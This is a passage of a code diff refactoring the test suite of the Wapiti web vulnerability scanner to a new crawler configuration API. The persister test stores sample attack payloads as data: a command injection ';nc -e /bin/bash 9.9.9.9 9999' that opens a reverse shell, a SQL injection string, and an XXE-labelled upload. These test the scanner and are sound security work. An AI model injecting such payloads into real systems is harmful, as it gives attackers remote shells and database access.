 from wapitiCore.net.web import Request
@@ -29,37 +30,36 @@ async def test_cookie_dump():
             )
         )
 
-        crawler = AsyncCrawler(Request(url))
-        await crawler.async_get(Request(url))
+        crawler_configuration = CrawlerConfiguration(Request(url))
+        async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+            await crawler.async_get(Request(url))
 
-        json_cookie.addcookies(crawler.session_cookies)
+            json_cookie.addcookies(crawler.session_cookies)
+            json_cookie.dump()
 
-        await crawler.close()
-        json_cookie.dump()
-
-        data = json.load(open(json_fd.name))
-        assert data == {
-            '.httpbin.org': {
-                '/': {
-                    'foo': {
-                        'expires': None,
-                        'port': None,
-                        'secure': False,
-                        'value': 'bar',
-                        'version': 0
-                    }
-                },
-                '/welcome/': {
-                    'dead': {
-                        'expires': None,
-                        'port': None,
-                        'secure': False,
-                        'value': 'beef',
-                        'version': 0
+            data = json.load(open(json_fd.name))
+            assert data == {
+                '.httpbin.org': {
+                    '/': {
+                        'foo': {
+                            'expires': None,
+                            'port': None,
+                            'secure': False,
+                            'value': 'bar',
+                            'version': 0
+                        }
+                    },
+                    '/welcome/': {
+                        'dead': {
+                            'expires': None,
+                            'port': None,
+                            'secure': False,
+                            'value': 'beef',
+                            'version': 0
+                        }
                     }
                 }
             }
-        }
 
 
 @pytest.mark.asyncio

--- a/tests/net/test_crawler.py
+++ b/tests/net/test_crawler.py
@@ -1,18 +1,18 @@
-from asyncio import Future
 from itertools import zip_longest
 
 import httpx
 import pytest
 import respx
-from httpx import Response
 
 from wapitiCore.net.crawler import AsyncCrawler
+from wapitiCore.net.crawler_configuration import CrawlerConfiguration
 from wapitiCore.net.page import Page
 from wapitiCore.net.web import Request
 
 
 @respx.mock
-def test_extract_disconnect_urls_one_url():
+@pytest.mark.asyncio
+async def test_extract_disconnect_urls_one_url():
     target_url = "http://perdu.com/"
     respx.get(target_url).mock(
         return_value=httpx.Response(
@@ -27,15 +27,15 @@ def test_extract_disconnect_urls_one_url():
     resp = httpx.get(target_url, follow_redirects=False)
     page = Page(resp)
 
-    crawler = AsyncCrawler(Request(target_url), timeout=1)
-
-    disconnect_urls = crawler._extract_disconnect_urls(page)
-
-    assert len(disconnect_urls) == 1
+    crawler_configuration = CrawlerConfiguration(Request(target_url), timeout=1)
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        disconnect_urls = crawler._extract_disconnect_urls(page)
+        assert len(disconnect_urls) == 1
 
 
 @respx.mock
-def test_extract_disconnect_urls_no_url():
+@pytest.mark.asyncio
+async def test_extract_disconnect_urls_no_url():
     target_url = "http://perdu.com/"
     respx.get(target_url).mock(
         return_value=httpx.Response(
@@ -50,15 +50,15 @@ def test_extract_disconnect_urls_no_url():
     resp = httpx.get(target_url, follow_redirects=False)
     page = Page(resp)
 
-    crawler = AsyncCrawler(Request(target_url), timeout=1)
-
-    disconnect_urls = crawler._extract_disconnect_urls(page)
-
-    assert len(disconnect_urls) == 0
+    crawler_configuration = CrawlerConfiguration(Request(target_url), timeout=1)
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        disconnect_urls = crawler._extract_disconnect_urls(page)
+        assert len(disconnect_urls) == 0
 
 
 @respx.mock
-def test_extract_disconnect_urls_multiple_urls():
+@pytest.mark.asyncio
+async def test_extract_disconnect_urls_multiple_urls():
     target_url = "http://perdu.com/"
     respx.get(target_url).mock(
         return_value=httpx.Response(
@@ -74,11 +74,10 @@ def test_extract_disconnect_urls_multiple_urls():
     resp = httpx.get(target_url, follow_redirects=False)
     page = Page(resp)
 
-    crawler = AsyncCrawler(Request(target_url), timeout=1)
-
-    disconnect_urls = crawler._extract_disconnect_urls(page)
-
-    assert len(disconnect_urls) == 2
+    crawler_configuration = CrawlerConfiguration(Request(target_url), timeout=1)
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        disconnect_urls = crawler._extract_disconnect_urls(page)
+        assert len(disconnect_urls) == 2
 
 
 @respx.mock
@@ -114,16 +113,17 @@ async def test_async_try_login_post_good_credentials():
         )
     )
 
-    crawler = AsyncCrawler(Request(target_url), timeout=1)
-    crawler._auth_credentials = ["username", "password"]
+    crawler_configuration = CrawlerConfiguration(Request(target_url), timeout=1)
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        crawler._auth_credentials = ["username", "password"]
 
-    is_logged_in, form, disconnect_urls = await crawler._async_try_login_post("username", "password", target_url)
+        is_logged_in, form, disconnect_urls = await crawler._async_try_login_post("username", "password", target_url)
 
-    assert form == {'login_field': 'uname', 'password_field': 'pass'}
-    assert len(disconnect_urls) == 2
-    assert "http://perdu.com/foobar/signout" in disconnect_urls
-    assert "http://perdu.com/a/b/signout" in disconnect_urls
-    assert is_logged_in is True
+        assert form == {'login_field': 'uname', 'password_field': 'pass'}
+        assert len(disconnect_urls) == 2
+        assert "http://perdu.com/foobar/signout" in disconnect_urls
+        assert "http://perdu.com/a/b/signout" in disconnect_urls
+        assert is_logged_in is True
 
 
 @respx.mock
@@ -158,14 +158,15 @@ async def test_async_try_login_post_wrong_credentials():
         )
     )
 
-    crawler = AsyncCrawler(Request(target_url), timeout=1)
-    crawler._auth_credentials = ["username", "password"]
+    crawler_configuration = CrawlerConfiguration(Request(target_url), timeout=1)
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        crawler._auth_credentials = ["username", "password"]
 
-    is_logged_in, form, disconnect_urls = await crawler._async_try_login_post("username", "password", target_url)
+        is_logged_in, form, disconnect_urls = await crawler._async_try_login_post("username", "password", target_url)
 
-    assert form == {'login_field': 'uname', 'password_field': 'pass'}
-    assert len(disconnect_urls) == 0
-    assert is_logged_in is False
+        assert form == {'login_field': 'uname', 'password_field': 'pass'}
+        assert len(disconnect_urls) == 0
+        assert is_logged_in is False
 
 
 @respx.mock
@@ -183,14 +184,15 @@ async def test_async_try_login_post_form_not_detected():
         )
     )
 
-    crawler = AsyncCrawler(Request(target_url), timeout=1)
-    crawler._auth_credentials = ["username", "password"]
+    crawler_configuration = CrawlerConfiguration(Request(target_url), timeout=1)
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        crawler._auth_credentials = ["username", "password"]
 
-    is_logged_in, form, disconnect_urls = await crawler._async_try_login_post("username", "password", target_url)
+        is_logged_in, form, disconnect_urls = await crawler._async_try_login_post("username", "password", target_url)
 
-    assert form == {}
-    assert len(disconnect_urls) == 0
-    assert is_logged_in is False
+        assert form == {}
+        assert len(disconnect_urls) == 0
+        assert is_logged_in is False
 
 
 @respx.mock
@@ -216,14 +218,15 @@ async def test_async_try_login_basic_digest_ntlm_good_credentials():
         )
     )
 
-    crawler = AsyncCrawler(Request(target_url), timeout=1)
-    crawler._auth_credentials = ["username", "password"]
+    crawler_configuration = CrawlerConfiguration(Request(target_url), timeout=1)
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        crawler._auth_credentials = ["username", "password"]
 
-    is_logged_in, form, disconnect_urls = await crawler._async_try_login_basic_digest_ntlm(auth_url)
+        is_logged_in, form, disconnect_urls = await crawler._async_try_login_basic_digest_ntlm(auth_url)
 
-    assert is_logged_in is True
-    assert len(form) == 0
-    assert len(disconnect_urls) == 0
+        assert is_logged_in is True
+        assert len(form) == 0
+        assert len(disconnect_urls) == 0
 
 
 @respx.mock
@@ -247,11 +250,11 @@ async def test_multiple_redirecton():
             )
         )
 
-    crawler = AsyncCrawler(Request(target_url), timeout=1)
-
-    page = await crawler.async_get(Request(target_url), follow_redirects=True)
-    assert page.status == 200
-    assert page.content == "OK"
+    crawler_configuration = CrawlerConfiguration(Request(target_url), timeout=1)
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        page = await crawler.async_get(Request(target_url), follow_redirects=True)
+        assert page.status == 200
+        assert page.content == "OK"
 
 
 @respx.mock
@@ -275,22 +278,23 @@ async def test_async_try_login_basic_digest_ntlm_wrong_credentials():
         ["http://perdu.com/login3", 404]
     ]
 
-    crawler = AsyncCrawler(Request(target_url), timeout=1)
-    crawler._auth_credentials = ["username", "password"]
+    crawler_configuration = CrawlerConfiguration(Request(target_url), timeout=1)
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        crawler._auth_credentials = ["username", "password"]
 
-    for auth_url, status_code in auth_urls:
-        respx.get(auth_url).mock(
-            return_value=httpx.Response(
-                status_code,
-                text="KO"
+        for auth_url, status_code in auth_urls:
+            respx.get(auth_url).mock(
+                return_value=httpx.Response(
+                    status_code,
+                    text="KO"
+                )
             )
-        )
 
-        is_logged_in, form, disconnect_urls = await crawler._async_try_login_basic_digest_ntlm(auth_url)
+            is_logged_in, form, disconnect_urls = await crawler._async_try_login_basic_digest_ntlm(auth_url)
 
-        assert is_logged_in is False
-        assert len(form) == 0
-        assert len(disconnect_urls) == 0
+            assert is_logged_in is False
+            assert len(form) == 0
+            assert len(disconnect_urls) == 0
 
 
 @respx.mock
@@ -313,23 +317,23 @@ async def test_extract_disconnect_urls():
         )
     )
 
-    crawler = AsyncCrawler(Request(target_url), timeout=1)
+    crawler_configuration = CrawlerConfiguration(Request(target_url), timeout=1)
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        page = await crawler.async_get(Request(target_url))
 
-    page = await crawler.async_get(Request(target_url))
+        disconnect_urls = crawler._extract_disconnect_urls(page)
 
-    disconnect_urls = crawler._extract_disconnect_urls(page)
+        test_disconnect_urls = [
+            "http://perdu.com/foobar/logout",
+            "http://perdu.com/foobar/logoff",
+            "http://perdu.com/foobar/signout",
+            "http://perdu.com/foobar/signoff",
+            "http://perdu.com/foobar/disconnect",
+            "http://perdu.com/foobar/déconnexion"
+        ]
 
-    test_disconnect_urls = [
-        "http://perdu.com/foobar/logout",
-        "http://perdu.com/foobar/logoff",
-        "http://perdu.com/foobar/signout",
-        "http://perdu.com/foobar/signoff",
-        "http://perdu.com/foobar/disconnect",
-        "http://perdu.com/foobar/déconnexion"
-    ]
-
-    assert len(disconnect_urls) == len(test_disconnect_urls)
-    assert all(url in disconnect_urls for url in test_disconnect_urls) is True
+        assert len(disconnect_urls) == len(test_disconnect_urls)
+        assert all(url in disconnect_urls for url in test_disconnect_urls) is True
 
 
 # @respx.mock

--- a/tests/web/test_crawl.py
+++ b/tests/web/test_crawl.py
@@ -45,6 +45,7 @@ async def test_resume_crawling():
     temp_obj = TemporaryDirectory()
     wapiti = Wapiti(Request("http://perdu.com/"), session_dir=temp_obj.name)
     await wapiti.init_persister()
+    await wapiti.init_crawler()
     await wapiti.load_scan_state()
     await wapiti.browse(stop_event, parallelism=1)
     await wapiti.save_scan_state()
@@ -58,6 +59,7 @@ async def test_resume_crawling():
 
     wapiti = Wapiti(Request("http://perdu.com/"), session_dir=temp_obj.name)
     await wapiti.init_persister()
+    await wapiti.init_crawler()
     await wapiti.load_scan_state()
     await wapiti.browse(stop_event)
     await wapiti.save_scan_state()

--- a/tests/web/test_explorer.py
+++ b/tests/web/test_explorer.py
@@ -11,6 +11,7 @@ import respx
 import httpx
 
 from wapitiCore.net.crawler import AsyncCrawler
+from wapitiCore.net.crawler_configuration import CrawlerConfiguration
 from wapitiCore.net.explorer import Explorer
 from wapitiCore.net.web import Request
 
@@ -28,36 +29,36 @@ def run_around_tests():
 
 @pytest.mark.asyncio
 async def test_qs_limit():
-    crawler = AsyncCrawler(Request("http://127.0.0.1:65080/"))
-    explorer = Explorer(crawler, Event())
-    start_urls = deque(["http://127.0.0.1:65080/"])
-    excluded_urls = []
-    # We should have root url, huge form page, target and target with POST method
-    assert len([__ async for __ in explorer.async_explore(start_urls, excluded_urls)]) == 4
-    await crawler.close()
+    crawler_configuration = CrawlerConfiguration(Request("http://127.0.0.1:65080/"))
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        explorer = Explorer(crawler, Event())
+        start_urls = deque(["http://127.0.0.1:65080/"])
+        excluded_urls = []
+        # We should have root url, huge form page, target and target with POST method
+        assert len([__ async for __ in explorer.async_explore(start_urls, excluded_urls)]) == 4
 
-    crawler = AsyncCrawler(Request("http://127.0.0.1:65080/"))
-    explorer = Explorer(crawler, Event())
-    # Exclude huge POST form with limit of parameters
-    explorer.qs_limit = 500
-    start_urls = deque(["http://127.0.0.1:65080/"])
-    excluded_urls = []
-    # We should have root url, huge form page, target and target with POST method
-    assert len([__ async for __ in explorer.async_explore(start_urls, excluded_urls)]) == 3
-    await crawler.close()
+    crawler_configuration = CrawlerConfiguration(Request("http://127.0.0.1:65080/"))
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        explorer = Explorer(crawler, Event())
+        # Exclude huge POST form with limit of parameters
+        explorer.qs_limit = 500
+        start_urls = deque(["http://127.0.0.1:65080/"])
+        excluded_urls = []
+        # We should have root url, huge form page, target and target with POST method
+        assert len([__ async for __ in explorer.async_explore(start_urls, excluded_urls)]) == 3
 
 
 @pytest.mark.asyncio
 async def test_explorer_filtering():
-    crawler = AsyncCrawler(Request("http://127.0.0.1:65080/"))
-    explorer = Explorer(crawler, Event())
-    start_urls = deque(["http://127.0.0.1:65080/filters.html"])
-    excluded_urls = []
-    results = {resource.url async for resource, response in explorer.async_explore(start_urls, excluded_urls)}
-    # We should have current URL and JS URL but without query string.
-    # CSS URL should be excluded
-    assert results == {"http://127.0.0.1:65080/filters.html", "http://127.0.0.1:65080/yolo.js"}
-    await crawler.close()
+    crawler_configuration = CrawlerConfiguration(Request("http://127.0.0.1:65080/"))
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        explorer = Explorer(crawler, Event())
+        start_urls = deque(["http://127.0.0.1:65080/filters.html"])
+        excluded_urls = []
+        results = {resource.url async for resource, response in explorer.async_explore(start_urls, excluded_urls)}
+        # We should have current URL and JS URL but without query string.
+        # CSS URL should be excluded
+        assert results == {"http://127.0.0.1:65080/filters.html", "http://127.0.0.1:65080/yolo.js"}
 
 
 @pytest.mark.asyncio
@@ -72,12 +73,12 @@ async def test_cookies():
 
     respx.get("http://perdu.com/cookies").mock(side_effect=print_headers_callback)
 
-    crawler = AsyncCrawler(Request("http://perdu.com/"))
-    response = await crawler.async_get(Request("http://perdu.com/"))
-    assert "foo=bar" in response.headers["set-cookie"]
-    response = await crawler.async_get(Request("http://perdu.com/cookies"))
-    assert "foo=bar" in response.content
-    await crawler.close()
+    crawler_configuration = CrawlerConfiguration(Request("http://perdu.com/"))
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        response = await crawler.async_get(Request("http://perdu.com/"))
+        assert "foo=bar" in response.headers["set-cookie"]
+        response = await crawler.async_get(Request("http://perdu.com/cookies"))
+        assert "foo=bar" in response.content
 
 
 @pytest.mark.asyncio
@@ -92,13 +93,12 @@ async def test_drop_cookies():
 
     respx.get("http://perdu.com/cookies").mock(side_effect=print_headers_callback)
 
-    crawler = AsyncCrawler(Request("http://perdu.com/"))
-    crawler.drop_cookies = True
-    response = await crawler.async_get(Request("http://perdu.com/"))
-    assert "foo=bar" in response.headers["set-cookie"]
-    response = await crawler.async_get(Request("http://perdu.com/cookies"))
-    assert "foo=bar" not in response.content
-    await crawler.close()
+    crawler_configuration = CrawlerConfiguration(Request("http://perdu.com/"), drop_cookies=True)
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        response = await crawler.async_get(Request("http://perdu.com/"))
+        assert "foo=bar" in response.headers["set-cookie"]
+        response = await crawler.async_get(Request("http://perdu.com/cookies"))
+        assert "foo=bar" not in response.content
 
 
 def test_save_and_restore_state():
@@ -129,84 +129,84 @@ def test_save_and_restore_state():
 @pytest.mark.asyncio
 @respx.mock
 async def test_explorer_extract_links():
-    crawler = AsyncCrawler(Request("http://perdu.com/"))
-    explorer = Explorer(crawler, Event())
+    crawler_configuration = CrawlerConfiguration(Request("http://perdu.com/"), drop_cookies=True)
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        explorer = Explorer(crawler, Event())
 
-    respx.get("http://perdu.com/").mock(
-        return_value=httpx.Response(
-            200,
-            text="""<html><body>
-            <a href="http://perdu.com/index.html"></a>
-            <a href="https://perdu.com/secure_index.html"></a>
-            <a href="//perdu.com/protocol_relative.html"></a>
-            <a href="//lol.com/protocol_relative.html"></a>
-            <a href="http://perdu.com:8000/other_port.html"></a>
-            <a href="http://microsoft.com/other_domain.html"></a>
-            <a href="welcome.html"></a>
-            <a href="/about.html"></a>
-            <form method="POST" action="http://perdu.com/valid_form.html">
-            <input name="field" type="hidden" value="hello"/></form>
-            <form method="POST" action="http://external.com/external_form.html">
-            <input name="field" type="hidden" value="hello"/></form>
-            """
+        respx.get("http://perdu.com/").mock(
+            return_value=httpx.Response(
+                200,
+                text="""<html><body>
+                <a href="http://perdu.com/index.html"></a>
+                <a href="https://perdu.com/secure_index.html"></a>
+                <a href="//perdu.com/protocol_relative.html"></a>
+                <a href="//lol.com/protocol_relative.html"></a>
+                <a href="http://perdu.com:8000/other_port.html"></a>
+                <a href="http://microsoft.com/other_domain.html"></a>
+                <a href="welcome.html"></a>
+                <a href="/about.html"></a>
+                <form method="POST" action="http://perdu.com/valid_form.html">
+                <input name="field" type="hidden" value="hello"/></form>
+                <form method="POST" action="http://external.com/external_form.html">
+                <input name="field" type="hidden" value="hello"/></form>
+                """
+            )
         )
-    )
 
-    request = Request("http://perdu.com/")
-    page = await crawler.async_send(request)
-    results = list(explorer.extract_links(page, request))
-    # We should get 6 resources as the âth from the form will also be used as url
-    assert len(results) == 6
-    await crawler.close()
+        request = Request("http://perdu.com/")
+        page = await crawler.async_send(request)
+        results = list(explorer.extract_links(page, request))
+        # We should get 6 resources as the âth from the form will also be used as url
+        assert len(results) == 6
 
 
 @pytest.mark.asyncio
 @respx.mock
 async def test_explorer_extract_links_from_js():
-    crawler = AsyncCrawler(Request("http://perdu.com/"))
-    explorer = Explorer(crawler, Event())
+    crawler_configuration = CrawlerConfiguration(Request("http://perdu.com/"), drop_cookies=True)
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        explorer = Explorer(crawler, Event())
 
-    respx.get("http://perdu.com/").mock(
-        return_value=httpx.Response(
-            200,
-            text="""Hello there!
-        <a href="http://perdu.com/index.html"></a>
-        <script src="main-es5.1211ab72babef8.js"></script>
-        """
+        respx.get("http://perdu.com/").mock(
+            return_value=httpx.Response(
+                200,
+                text="""Hello there!
+            <a href="http://perdu.com/index.html"></a>
+            <script src="main-es5.1211ab72babef8.js"></script>
+            """
+            )
         )
-    )
 
-    respx.get("http://perdu.com/main-es5.1211ab72babef8.js").mock(
-        return_value=httpx.Response(
-            200,
-            text="""
-            AytR: function (e, t, n) {
-                'use strict';n.d(t, 'a', (function () {return r}));
-                const r = {
-                    web: "http://perdu.com/",
-                    host: "http://host.perdu.com/",
-                    api: "http://perdu.com/api",
-                }
-            };
-            const Ke = [{path: "/admin",submenu: [{path: "/admin/profile",submenu: []},{path: "/admin/users/add",submenu: []}]}],
-            Ye = [{path: "/dashboard",submenu: [{path: "/dashboard/results",submenu: []},{path: "/dashboard/result.json",submenu: []}]}];
-            router.navigate(["secret", "path"]); router.createUrlTree(["this", "is", "my" + "_path"]);
-            router.navigateByUrl(this.url + "/api/admin"); router.parseUrl(this.url + "/test");
-            """,
-            headers={"content-type": "application/javascript"}
+        respx.get("http://perdu.com/main-es5.1211ab72babef8.js").mock(
+            return_value=httpx.Response(
+                200,
+                text="""
+                AytR: function (e, t, n) {
+                    'use strict';n.d(t, 'a', (function () {return r}));
+                    const r = {
+                        web: "http://perdu.com/",
+                        host: "http://host.perdu.com/",
+                        api: "http://perdu.com/api",
+                    }
+                };
+                const Ke = [{path: "/admin",submenu: [{path: "/admin/profile",submenu: []},{path: "/admin/users/add",submenu: []}]}],
+                Ye = [{path: "/dashboard",submenu: [{path: "/dashboard/results",submenu: []},{path: "/dashboard/result.json",submenu: []}]}];
+                router.navigate(["secret", "path"]); router.createUrlTree(["this", "is", "my" + "_path"]);
+                router.navigateByUrl(this.url + "/api/admin"); router.parseUrl(this.url + "/test");
+                """,
+                headers={"content-type": "application/javascript"}
+            )
         )
-    )
 
-    request = Request("http://perdu.com/")
-    page = await crawler.async_send(request)
-    results = list(explorer.extract_links(page, request))
-    assert len(results) == 2
+        request = Request("http://perdu.com/")
+        page = await crawler.async_send(request)
+        results = list(explorer.extract_links(page, request))
+        assert len(results) == 2
 
-    request = Request("http://perdu.com/main-es5.1211ab72babef8.js")
-    page = await crawler.async_send(request)
+        request = Request("http://perdu.com/main-es5.1211ab72babef8.js")
+        page = await crawler.async_send(request)
 
-    results = list(explorer.extract_links(page, request))
-    # http://host.perdu.com is out of scope since by default scope is folder
-    assert len(results) == 12
-    assert Request("http://perdu.com/secret/path", "GET", link_depth=1) in results
-    await crawler.close()
+        results = list(explorer.extract_links(page, request))
+        # http://host.perdu.com is out of scope since by default scope is folder
+        assert len(results) == 12
+        assert Request("http://perdu.com/secret/path", "GET", link_depth=1) in results

--- a/tests/web/test_network_issues.py
+++ b/tests/web/test_network_issues.py
@@ -7,6 +7,7 @@ import pytest
 from httpx import ReadTimeout
 
 from wapitiCore.net.crawler import AsyncCrawler
+from wapitiCore.net.crawler_configuration import CrawlerConfiguration
 from wapitiCore.net.web import Request
 
 
@@ -26,11 +27,10 @@ async def test_chunked_timeout():
     url = "http://127.0.0.1:65080/chunked_timeout.php"
 
     request = Request(url)
-    crawler = AsyncCrawler(request, timeout=1)
-
-    with pytest.raises(ReadTimeout):
-        await crawler.async_send(request)
-    await crawler.close()
+    crawler_configuration = CrawlerConfiguration(request, timeout=1)
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        with pytest.raises(ReadTimeout):
+            await crawler.async_send(request)
 
 
 @pytest.mark.asyncio
@@ -38,8 +38,7 @@ async def test_timeout():
     url = "http://127.0.0.1:65080/timeout.php"
 
     request = Request(url)
-    crawler = AsyncCrawler(request, timeout=1)
-
-    with pytest.raises(ReadTimeout):
-        await crawler.async_send(request)
-    await crawler.close()
+    crawler_configuration = CrawlerConfiguration(request, timeout=1)
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        with pytest.raises(ReadTimeout):
+            await crawler.async_send(request)

--- a/tests/web/test_persister.py
+++ b/tests/web/test_persister.py
@@ -5,6 +5,7 @@ import pytest
 import httpx
 import respx
 
+from wapitiCore.net.crawler_configuration import CrawlerConfiguration
 from wapitiCore.net.sql_persister import SqlPersister
 from wapitiCore.net.web import Request
 from wapitiCore.net.crawler import AsyncCrawler, Page
@@ -16,98 +17,97 @@ async def test_persister_basic():
     url = "http://httpbin.org/?k=v"
     respx.get(url).mock(return_value=httpx.Response(200, text="Hello world!"))
 
-    crawler = AsyncCrawler(Request("http://httpbin.org/"))
+    crawler_configuration = CrawlerConfiguration(Request("http://httpbin.org/"))
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        try:
+            os.unlink("/tmp/crawl.db")
+        except FileNotFoundError:
+            pass
 
-    try:
-        os.unlink("/tmp/crawl.db")
-    except FileNotFoundError:
-        pass
+        persister = SqlPersister("/tmp/crawl.db")
+        await persister.create()
+        await persister.set_root_url("http://httpbin.org/")
 
-    persister = SqlPersister("/tmp/crawl.db")
-    await persister.create()
-    await persister.set_root_url("http://httpbin.org/")
+        simple_get = Request("http://httpbin.org/?k=v")
 
-    simple_get = Request("http://httpbin.org/?k=v")
+        simple_post = Request(
+            "http://httpbin.org/post?var1=a&var2=b",
+            post_params=[["post1", "c"], ["post2", "d"]]
+        )
+        await persister.set_to_browse([simple_get, simple_post])
 
-    simple_post = Request(
-        "http://httpbin.org/post?var1=a&var2=b",
-        post_params=[["post1", "c"], ["post2", "d"]]
-    )
-    await persister.set_to_browse([simple_get, simple_post])
+        assert await persister.get_root_url() == "http://httpbin.org/"
+        assert await persister.count_paths() == 2
+        assert not [__ async for __ in persister.get_links()]
+        assert not [__ async for __ in persister.get_forms()]
+        assert not [__ async for __ in persister.get_payloads()]
 
-    assert await persister.get_root_url() == "http://httpbin.org/"
-    assert await persister.count_paths() == 2
-    assert not [__ async for __ in persister.get_links()]
-    assert not [__ async for __ in persister.get_forms()]
-    assert not [__ async for __ in persister.get_payloads()]
+        stored_requests = set([__ async for __ in persister.get_to_browse()])
+        assert simple_get in stored_requests
+        assert simple_post in stored_requests
 
-    stored_requests = set([__ async for __ in persister.get_to_browse()])
-    assert simple_get in stored_requests
-    assert simple_post in stored_requests
+        # If there is some requests stored then it means scan was started
+        assert await persister.has_scan_started()
+        assert not await persister.has_scan_finished()
+        assert not await persister.have_attacks_started()
 
-    # If there is some requests stored then it means scan was started
-    assert await persister.has_scan_started()
-    assert not await persister.has_scan_finished()
-    assert not await persister.have_attacks_started()
+        for req in stored_requests:
+            if req == simple_get:
+                await crawler.async_send(req)
+                # Add the sent request
+                await persister.save_request(req)
+                assert req.path_id == 1
+                assert await persister.get_path_by_id(1) == req
+                break
 
-    for req in stored_requests:
-        if req == simple_get:
-            await crawler.async_send(req)
-            # Add the sent request
-            await persister.save_request(req)
-            assert req.path_id == 1
-            assert await persister.get_path_by_id(1) == req
-            break
+        # Should be one now as the link was crawled
+        assert len([__ async for __ in persister.get_links()]) == 1
+        # We still have two entries in paths though as the resource just got updated
+        assert await persister.count_paths() == 2
 
-    # Should be one now as the link was crawled
-    assert len([__ async for __ in persister.get_links()]) == 1
-    # We still have two entries in paths though as the resource just got updated
-    assert await persister.count_paths() == 2
+        await persister.set_attacked([1], "xss")
+        assert await persister.count_attacked("xss") == 1
+        assert await persister.have_attacks_started()
 
-    await persister.set_attacked([1], "xss")
-    assert await persister.count_attacked("xss") == 1
-    assert await persister.have_attacks_started()
+        naughty_get = Request("http://httpbin.org/?k=1%20%OR%200")
 
-    naughty_get = Request("http://httpbin.org/?k=1%20%OR%200")
+        await persister.add_payload(
+            1,  # request_id
+            "vulnerability",  # payload_type
+            "sql",  # module
+            "SQL Injection",  # category
+            1,  # level
+            naughty_get,  # request
+            "k",  # parameter
+            "OR bypass"  # info
+        )
 
-    await persister.add_payload(
-        1,  # request_id
-        "vulnerability",  # payload_type
-        "sql",  # module
-        "SQL Injection",  # category
-        1,  # level
-        naughty_get,  # request
-        "k",  # parameter
-        "OR bypass"  # info
-    )
+        assert [__ async for __ in persister.get_payloads()]
+        await persister.flush_attacks()
+        assert not await persister.have_attacks_started()
+        assert not [__ async for __ in persister.get_payloads()]
+        await persister.flush_session()
+        assert not await persister.count_paths()
 
-    assert [__ async for __ in persister.get_payloads()]
-    await persister.flush_attacks()
-    assert not await persister.have_attacks_started()
-    assert not [__ async for __ in persister.get_payloads()]
-    await persister.flush_session()
-    assert not await persister.count_paths()
+        naughty_post = Request(
+            "http://httpbin.org/post?var1=a&var2=b",
+            post_params=[["post1", "c"], ["post2", ";nc -e /bin/bash 9.9.9.9 9999"]]
+        )
 
-    naughty_post = Request(
-        "http://httpbin.org/post?var1=a&var2=b",
-        post_params=[["post1", "c"], ["post2", ";nc -e /bin/bash 9.9.9.9 9999"]]
-    )
-
-    await persister.add_payload(
-        1,  # request_id
-        "vulnerability",  # payload_type
-        "exec",  # module
-        "Command Execution",  # category
-        1,  # level
-        naughty_post,  # request
-        "post2",  # parameter
-        ";nc -e /bin/bash 9.9.9.9 9999"  # info
-    )
-    payload = [__ async for __ in persister.get_payloads()][0]
-    await persister.close()
-    assert naughty_post == payload.evil_request
-    assert payload.parameter == "post2"
-    await crawler.close()
+        await persister.add_payload(
+            1,  # request_id
+            "vulnerability",  # payload_type
+            "exec",  # module
+            "Command Execution",  # category
+            1,  # level
+            naughty_post,  # request
+            "post2",  # parameter
+            ";nc -e /bin/bash 9.9.9.9 9999"  # info
+        )
+        payload = [__ async for __ in persister.get_payloads()][0]
+        await persister.close()
+        assert naughty_post == payload.evil_request
+        assert payload.parameter == "post2"
 
 
 @pytest.mark.asyncio
@@ -141,41 +141,40 @@ async def test_persister_upload():
     assert xml_upload in stored_requests
 
     respx.post("http://httpbin.org/post?qs1").mock(return_value=httpx.Response(200, text="Hello there"))
-    crawler = AsyncCrawler(Request("http://httpbin.org/"))
+    crawler_configuration = CrawlerConfiguration(Request("http://httpbin.org/"))
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        for req in stored_requests:
+            await crawler.async_send(req)
+            await persister.save_request(req)
 
-    for req in stored_requests:
-        await crawler.async_send(req)
-        await persister.save_request(req)
+            if req == simple_upload:
+                assert req.file_params == simple_upload.file_params
+                assert req.file_params[0] == ["file1", ("'fname1", b"content", "text/plain")]
+                assert req.file_params[1] == ["file2", ("fname2", b"content", "text/plain")]
+            else:
+                assert req.file_params == xml_upload.file_params
+                assert req.file_params[0] == ["calendar", ("calendar.xml", b"<xml>Hello there</xml>", "application/xml")]
 
-        if req == simple_upload:
-            assert req.file_params == simple_upload.file_params
-            assert req.file_params[0] == ["file1", ("'fname1", b"content", "text/plain")]
-            assert req.file_params[1] == ["file2", ("fname2", b"content", "text/plain")]
-        else:
-            assert req.file_params == xml_upload.file_params
-            assert req.file_params[0] == ["calendar", ("calendar.xml", b"<xml>Hello there</xml>", "application/xml")]
+        naughty_file = Request(
+            "http://httpbin.org/post?qs1",
+            post_params=[["post1", "c"], ["post2", "d"]],
+            file_params=[["calendar", ("calendar.xml", b"<xml>XXE there</xml>", "application/xml")]]
+        )
 
-    naughty_file = Request(
-        "http://httpbin.org/post?qs1",
-        post_params=[["post1", "c"], ["post2", "d"]],
-        file_params=[["calendar", ("calendar.xml", b"<xml>XXE there</xml>", "application/xml")]]
-    )
-
-    await persister.add_payload(
-        1,  # request_id
-        "vulnerability",  # payload_type
-        "exec",  # module
-        "Command Execution",  # category
-        1,  # level
-        naughty_file,  # request
-        "calendar",  # parameter
-        "<xml>XXE there</xml>"  # info
-    )
